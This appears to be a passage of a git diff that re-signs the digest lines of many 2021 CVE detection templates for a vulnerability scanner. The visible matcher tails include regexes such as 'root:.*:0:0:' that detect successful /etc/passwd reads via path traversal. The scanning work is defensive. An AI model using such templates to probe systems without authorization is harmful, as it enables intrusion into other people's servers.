4b0a00483046022100d42d578672d94412d65c62a6441dc5ae3d6bdbcdcb52205a0f76b738f59bae2b022100e4aaee8b8d9b419de8d5215bd7ea2528e62a6adc0b71a29e92c42c2e4332af00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 892fd6e7f5..d4fd926475 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c3cd3fcfe337c0c3bf3f141e268c4cb3e002423d6e3548ff23bcbd491c3985f022100ea3bc691a51662cc8e63a76bfd75b8dd912d1a978fee1f84bb0fc26d13aff053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd286420b08ecdab35c1dc01933f9d6ffb349a3c20f171ff32df173ed7a03638022002afe6367292693215736639592427f781d98e530958204e37adec564e7b7cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 3882bb576c..c035151ef7 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eba320c7da3c4834ff65ad026efb26ae57c68bb259202093673bff5e18f5c628022100d03e87ea7cb81a79856da54bce64f0dd96c4d08a5bcc15d7aa122dec8bc4cda3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220257c5d9d7cb617d8a133b3cfd6ed8590058baf0a198d28412a57a15510d6fab102210086a0b871ba6ae585267bfa7b19077aaeaeee17d006fc51b468fb20a68f1d21b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 00709d33e3..2fd3636a6b 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207646eee4aa56e0329051709dffce67b5a0edf5f25c7eb190e70efc6d1b7b6f8c02202b08a5b0dd6adc756b48637e62ccc41bc5216d7b2207c2e52a2ff701a708d1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e40b07ad6becf60cf253cbf6f3c6333cd310e4bb45c38dee267dc7bfd4df626022044455d3d273af8f226531b6bef7faff64094cb241671e0b8f2cf623346345179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index fea5baad9f..00697c5f2e 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -46,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect\"")' condition: and -# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d9682cdcb8a39247b1f2923f30931761018c186957eca58eef1294ee24c2fa9022100dd83265eb60eb8119663c8d5805b5654203d946f4cf1ee4cb28f0414ac670ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 50a8575067..e72f35da1f 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203511b1cb2f7a8cd1729b55ab1f8915b3f30176b7b4eae5c9bd1be8fcf97e283502206204cbe58595dcb38370fe4d484c219c311df12cd6167045da3a30e893057574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index fa6db19a24..f6b66bcae2 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ec22a8c6f56f813625860d130e84ec88b50d3ac8b11f204d2af13a940bf663e022100dfa8b5515e53d1766d3cf8adc5a7287c3b90c0e3561aad887fd3417015e44469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 9d92f16b48..7c6b121592 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206578ad56fe12b3717623febd88c16fa3cba460c41b778647f1a0db70973c379a022100c159963d168a9c326192172b2c1947dcddd02b144f591f97881e82f24aa8afa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 89c0bf68ef..40fdece004 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203170f8da497c334096768ec8746961b30aeff00c01e06d9a9bdd6f9e6882f976022100a86c9e9cc5579d81b89be6201ce51f8495bf94bd872326e88e2d390df55662b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index bc2ed51d6b..537c65b870 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201153f232729b91bd3e71a6b6d6e98653249cabfb5d7cd39d08ee1f7959bd87dc0221009a509c44b3856076f6de262873ab1443d5d8c17bc9d8c9ba5b9087f46907c9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 3a356e0df3..1e73d70438 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206710e69599921a61cfa9195cd270abfa17826fd524db0ecac89afc222476c7a40220511b892349f56025fa5e3917d204da9c68deb4808260c5f09c006048176c6d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 4373d3e6c5..ab6e7c71c1 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d3f8bfca9ff864b5abf41834779fd591efcbfccda6cd6d38a6edd71e4e6d97c022042f51441b7d5514ffd65f8467500374e8e43b594839c46aa9ca5cd6aa754e558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e80fd425b53f7f35d7683c5353de18764fa1a87380a6e038061ebfd196dc45f302201a7aebcc35cbd2b3b5004ddaa381b9fd3117d7b7fbee65257c3df158e25c1f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index f54de54a16..ca11695bcc 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -59,4 +59,4 @@ http: group: 1 regex: - '"subTitle":"Grafana ([a-z0-9.]+)' -# digest: 4a0a004730450220733d9c9b0886194993d30c8b74ff942bf173ce98bc4618221bada7e54cc36574022100d4fe7afdb96b7f8631d53583b1d36f658e8156a630ce09b79dc52b60b73a80e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220150df20c5506e437af900f037ffb9c5f34c2d30fbbf6958817e8b423bbf601b6022032ca7a2df86fa3dc88fabbe5b0448eb47690fed488f140dddb8ffc0a4ae0293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 892ac67cf2..e0f6ad0482 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d41f20bacb64537c7ebc1f93a45af8685a507b6da99f0a122c733d0656cfcb5d022100eccec5cfa1f9c7487c61db7db3b808555117ca0dea3a276f1b81ada31e9fe969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b430161d4f67406d937f021501632a776b165e88766fe5aac19d7543e61cd54602202a8caef664b263d6de002809871fa56a635aaa6b25224efac19f5c6207e96eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 7ae351c658..27f7ab7a39 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -54,4 +54,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a004630440220350c5cacd0b231c91cdf48cda99ca1fc36a943c4e8b30342fabb9e5d0e1e7da50220450b72c0220ec3d7731717f613df423ce4f6468614feeb9c732013fb4702ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100883edb38fcae19e59f27d4186083d3d877ea6f3d4ac06f23a39aac3333eee128022100f3bca54269374c671b4aa37fe5d75bb65720a084359beded0ddb553286263455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 69b5afcdcd..42300b598c 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -66,4 +66,4 @@ http: - '(sid:[a-z0-9,;:]+)' internal: true part: body -# digest: 4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb62f2af75e25787314e1f044a5a3e99e02997cc2a93b986a8d82e9b09429d3402206aab025b09043d3dabc02f1df26a7d36f2e6871fae22e2c1374e96d030748733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 62446f3bca..5aa6798071 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a7a9c4eb1f6d88ab907ed75898c6c89513b60a8ec9f1502d7fdf3423b4ede7e022100c7433e0f70a4c7b46f3ece00d5c940a70f895108e18356877453d392a71c6059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 26295accf6..fcfbc94766 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201cf6f41a3258c77f1c2a596c881f1d3f0724e938d4f7c03970e59b0c76aa7456022005d47055e3129d39fb98a626771da66a86a32cac9bd81dd969c7b575d3beeacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072b7fc4cd692ab9e8e417246f7868462ef847c1f95a960e5a93d4745ca7b37d5022039639a91158fdb53e5d8889d110ffcf32a8946dcd9e56bba02d856301dba9229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 94a0c387f6..7dd93bf32b 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100aecde373293992828c4cfbb89e9aaeff35886bd612304c87e362070bf8bfa32f022053555cdc30e1b0aae2d359b107cd5d99f26bbd2c678f6dcb59b7e21b635ea048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058875581989ca4e54d5e3986767a50ab67379b96399ae31370838a8802a48a8502202b98ca545a8067cc45c4f296e9c83a84457b158313840ce17c4fa979a4646cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 270f84d39a..fc20ecc3ea 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -83,4 +83,4 @@ http: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body -# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a525d5c59991514ca7aa771cde7ee9eaa3b3643850ffc79f4f05443c7a39034022028c5ce317d97df379d079120c76db5a5398118512631f4143cbdf5288694d131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 0c64e4d407..8cca8d61d5 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ceaf43839bf7744044e64e288b4b135c0a9a25f1638c066ee7f2ec6681dc7f4022100e4ea51f58bca51151b2e34e3c43a48ff4a09e9961558ebd344e7e96e23ace169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aebc31f1000f3df4d4eea75eb59b9c31e33f5c655888104efd755fc64e6a054f022066f2a974d0e0b3691248be5b78a5b9446dbb01b815eff6dd6935a42ebae532f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index bcc7fd4486..63897e59ad 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f9574560b61dd8f4c9aaf234d06646f1519c0fc78e8ff44222e53a558d4259502201e5cfa092c0c0038bc53b925eb4d0270f7fa08ea4008152abad1281e7331b883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca76f577dc44e2400264e992033f83b1f8a942236bdbac9d9e1bf6e94bdbd2de022041bbbd7308d086ebd09e4e7c688db309354575a00da2a15dfcf7e32f01e4d5e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 6d03f016d1..f742c3c15d 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -57,4 +57,4 @@ http: - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c944618f8aa6b81f58862d8a998accfbe98be7301de9a9dd9aac0f53da956c990220246d8626a6c87df2dabc8a42cdfb9944f07f725dbcb861a0e65db3f02e74466e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e92d124438043c580868e402e2e2ca7d5b520b29beb530c3e30a4600cf951d710220048f8b6f336648d1f32ed6955fdfcfac15fffc42ac0d26b99738da0e4b46c441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 481c71c2ea..8b3946e122 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -64,4 +64,4 @@ http: - type: json json: - '.data.users.nodes[].username' -# digest: 4a0a004730450220613a98cc368da5cc7ab12e82f5cc55eefc653c8a56c2f399e808367802a55db9022100863f4d035cb38b3e355a7c3d98dde9f7bd2569aa27b24dc79bfd47cd92f1d6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050fac34eaa4b8a5b2f213f24950dbd4dcf6f761ac17f565dcb5fd1c07d33eb870220753826f439204315cc1cde0868ff106d22fee305559bdd4ecea19e00b26b80bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index da6933c6d4..93f2e4407e 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022075dfadbb373149d6cf94cfbbdd259581aeee17e122be2f6bfdddb63990affbe0022100b966f3954800e15febb8586b3122c809eb6064901fd9aed1af10ae14fd257205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031941daf741a41b37668ec1f1fae42ba658ad64ef871b927b284cd01ed9ca653022100ee5ccf45bad22efb395436c0a823dcaa6fb007fa03ea7bd5d0dbcac34861c491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index fb6c1c2b29..057cc91cb2 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -67,4 +67,4 @@ http: name: LFI regex: - "root:.*:0:0:" -# digest: 4a0a004730450221008a6bc546c437350fc98f88d2f5b38489ab7086b7fd9446872c2942f85926d15c02202b266a582773335d0ba8f75869654d2aff0c55d27dd9ab7874f19615691ceade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220631941b1855e5aeb33289778cb170dc873d3382190adfa010bec3870591df078022100d5eec25f6ed39e8e0f85c9abecc7b6505d3688a23cc8c4bb6bc2e90d836a7db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 7eee17aab2..ea1cf336da 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ce5fd76c9a1781db78f0544199cc278915836e75091d4cc5309eb801af17e423022100b8a72be1d67c62ddf8608098bac580263bf2ee4a7e50eed5ca22dfa063fe2c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e3c9efaa3a715b8d207baf7f389da9fa984edf381b5bb061f1e06c3668bfe72022100eb3a65ea459eab92757794ebe916ddb26b77809cf661a936536cead7aae41ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 27f3f94f59..5527ada552 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -123,4 +123,4 @@ http: part: body words: - "System.ArgumentNullException" -# digest: 4a0a004730450220549da14eb60031a9b529fc3169ea83c76228729fb4480aed08ee9d0234bb2643022100b19d676bcc6685264030c6a19348a30903eab93b1f9ea1db79f2f51eba4e34d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0ccc84d2693500a44a225123543843cf611348becfc83ff492f9cdb6acd964022100b5b3a6d5594ac10297868507176627c21f711192a607e45d72197c0a811cd6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index 9c49827e34..3a341fc7bd 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202200bb33a8fdb2552482855bd64af047fbdaf3c11f7e0a5b4050e4440258bbd902207d6fd8e80473b3d4904728d550b9a8eed1d9e58af15891b29b52697a06fa999b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4ab13abc51fc8e8aed0a34b0857598d6d5c45892dc84079eec7097957374d25022100c429c3c408aff7b82b3fe4d60af3ed0cedae9293053efc9d423fb82c3b575e11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 4c53bc0282..6fbfe8ab1e 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a07a07fb2e3194ad2762f9efa781ef992a86fbf5feced800125d26495d0864c80220607f5771d48a758fea34771b05b6a74f6b3bcc06e4243f1885d292f44db6df10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baa5a1f43f51829cac1ea016698d3e5dd9d309eef79e75c77b4bde8098b936cf022100f498c819ae81592210ea03d79e7ca430baefb317d61057da41e5300bc41575ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 2741769864..f63cd49636 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 401 -# digest: 490a0046304402204245a7e0a01a60f82cb2318913eef47d7e8cb54540fd75be345987a45500039e022038a89550ac2009c2d5599b7b9c1bdd145e53d22d60f9233b2d33e05c8da7855c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022062c84cad29d9ca7703e8e03ac264d0edb5d2a5748ff4b8909f6c512b03c3df09022100f0d8621b267cecfd1c0c270eae28110c29cece9abc470147ae8a48a531c68df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index c510465710..37b867f67e 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022053f4592830c11d887e52e9adf9ce2c3fdd654b249379fa2807f5e168bb8a703a0221008c178ce4e61fac8d8db6a13694f0c1c85e6e25d89d7d15ad0a340f557c8267e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f1b22fc87729007a56fb51d06e2b4ca74c0e1de3d6f54ba05e9705cca21290c022100820374d79b55b9aa0c9eca7827d2619972595a3eb6a7c8a5cdd59da1dca8a20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index f6d76339b5..e6eb7c04ec 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100e4ad28a7424b05b3865c69632dd1c109d3af0b5d6390857ac6fd73a7a7c3073d0220616a3ce10e35be955671681f8ab9ab5a937cc56e9b08aedfa1faf83202c4d98f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100811a7e5c879a0363e2d74c0779cf35f9f69c0880bff8de452edff0ed0268dbb5022100c3a6abc846b879c935297046e3f25112da0797aa587f4c1bf08d925b0742b9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 99af1b861a..08ffcdc8de 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022035f3b272f2f2eb3ffd2265b03fc34944ba5ea2298fe4943fccb382b77dcbfb5402206fae9c44d872dbd06fb5992248d7d731d43168f9ce8c47f3ede8c51ca7b34c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204477b496e3241200c2b91d3461403b663af64b6a0a5536e1bb8fa7820e354f6e022033b11a21dc6450b3b2887a15a256e89542249fae1a025af4428bbe63a1486662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 3e38714fe2..8df2d6d1e4 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220773163e2853dbed5f6fd4fae6f2f2b243b2605757ec3331c0551eb640638ea0802203c9ca3865da4f10c60c361481455fa5ccfc8bfaa6870724c8ddf74fd7167e254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index bd276d57db..ed98694c46 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -58,4 +58,4 @@ http: regex: - '"hash"\:"(.*?)"\,' internal: true -# digest: 490a0046304402202b9a1bdf1cbc00fde97e2d3f69bd9f98e0b6d0990fde7377b3ef61a888ad5cf2022068fa3c61d7aa62376e326713dc467e45fbc1fff477d0aa5a924bb944e6fe37df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df993e9b9153b842893b2405cf8a93a320330ae88a22f3d82a5fa06dd4733e84022100e62912c89bef546ec5b95ecf04d6d37c29f8f46c127f151f6ee890efce8a3c68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 0ecff67cdb..08db62ec3f 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a004830460221009aa2706fa8b6ea4b1a71152da0e7922133b04905f0bf17f0e1e62419b4f04ec4022100bb451f8f89d66e01b41d6f2081b87fa1250ff3a6a681fe8ebc42a3f33b0d4b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddf7f890623319dce2d58f2403bc17e40763149a8f2e41703c74e20af56bb82502201e57cc3e2e51afefd70f0bc17a5b139e48e7da24ac7f78e5f70b126a05627fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 1ddd5fcb17..6cf4d72280 